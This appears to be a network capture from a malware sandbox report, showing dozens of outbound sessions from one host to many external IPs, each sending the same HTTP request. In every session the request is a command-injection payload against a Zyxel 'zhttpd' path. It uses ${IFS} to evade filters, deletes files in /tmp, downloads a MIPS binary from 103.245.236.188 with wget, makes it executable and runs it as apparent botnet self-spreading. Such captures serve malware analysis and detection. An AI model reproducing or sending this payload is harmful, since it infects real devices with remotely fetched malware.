                                    Jan 13, 2024 19:02:31.107249975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3586192.168.2.1357100116.243.78.119443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.107300997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3587192.168.2.133827243.43.68.140443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.107352018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3588192.168.2.1360700152.126.116.224443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.107409954 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3589192.168.2.1353468218.151.223.171443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.107474089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3590192.168.2.1357844132.70.25.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.107544899 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3591192.168.2.134092490.215.8.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.107597113 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3592192.168.2.134377895.180.100.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.107657909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3593192.168.2.1346756219.8.252.172443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.107727051 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3594192.168.2.1350510199.130.190.123443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.107768059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3595192.168.2.1349718102.106.224.145443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.107799053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3596192.168.2.1339250218.55.235.119443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.107846975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3597192.168.2.135104052.29.32.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.107909918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3598192.168.2.1344354135.186.239.17443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.107969046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3599192.168.2.133353044.154.44.206443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.108010054 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3600192.168.2.1348284135.200.80.123443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.108095884 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3601192.168.2.1348560156.242.248.67443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.108165979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3602192.168.2.1347698117.23.248.81443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.108227968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3603192.168.2.1358368167.136.223.93443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.108278036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3604192.168.2.1351404132.35.207.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.108314991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3605192.168.2.135765638.100.86.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.108365059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3606192.168.2.135484669.172.51.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.108407021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3607192.168.2.1355370132.237.222.19443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.108464003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3608192.168.2.134804277.199.109.37443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.108521938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3609192.168.2.135224267.213.217.47443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.108611107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3610192.168.2.1359558221.229.43.239443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.108675957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3611192.168.2.135883038.131.207.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.108755112 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3612192.168.2.1355766217.254.105.18443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.108804941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3613192.168.2.1342812133.249.60.29443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.108865976 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3614192.168.2.1338480167.213.184.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.108935118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3615192.168.2.1351238219.76.47.109443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.108980894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3616192.168.2.135712823.106.123.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.109100103 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3617192.168.2.1357480123.178.91.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.109106064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3618192.168.2.133937027.54.43.221443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.109169960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3619192.168.2.134480835.117.69.186443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.109210968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3620192.168.2.1352146116.186.198.60443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.109271049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3621192.168.2.133513244.119.155.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.109333038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3622192.168.2.1360792178.39.46.41443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.109397888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3623192.168.2.1357156166.239.118.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.109460115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3624192.168.2.1341076105.171.206.130443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.109519005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3625192.168.2.135579449.46.211.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.109555960 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3626192.168.2.134941241.150.103.178443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.109623909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3627192.168.2.1358416102.81.146.88443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.109702110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3628192.168.2.133796439.225.229.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.109754086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3629192.168.2.134747881.133.117.242443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.109818935 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3630192.168.2.135608692.189.22.188443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.109893084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3631192.168.2.135212271.112.108.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.109952927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3632192.168.2.1360476144.43.249.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.109997988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3633192.168.2.133627247.220.141.211443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.110035896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3634192.168.2.133774824.2.90.119443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.110063076 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3635192.168.2.136025693.52.220.252443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.110106945 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3636192.168.2.135500080.212.111.183443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.110174894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3637192.168.2.133553484.208.61.190443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.110234022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3638192.168.2.13601004.252.20.219443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.110286951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3639192.168.2.134765690.110.138.133443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.110342979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3640192.168.2.1343294128.9.185.104443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.110392094 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3641192.168.2.1345218149.192.212.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.110430956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3642192.168.2.1347936167.211.51.123443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.110485077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3643192.168.2.135645483.222.30.223443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.110541105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3644192.168.2.135060260.102.123.208443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.110584974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3645192.168.2.135634447.69.124.1443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.110661983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3646192.168.2.1335352213.248.35.13443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.110702038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3647192.168.2.135453827.232.134.237443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:31.110771894 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3648192.168.2.1360308175.104.231.25443
                                    TimestampBytes transferredDirectionData
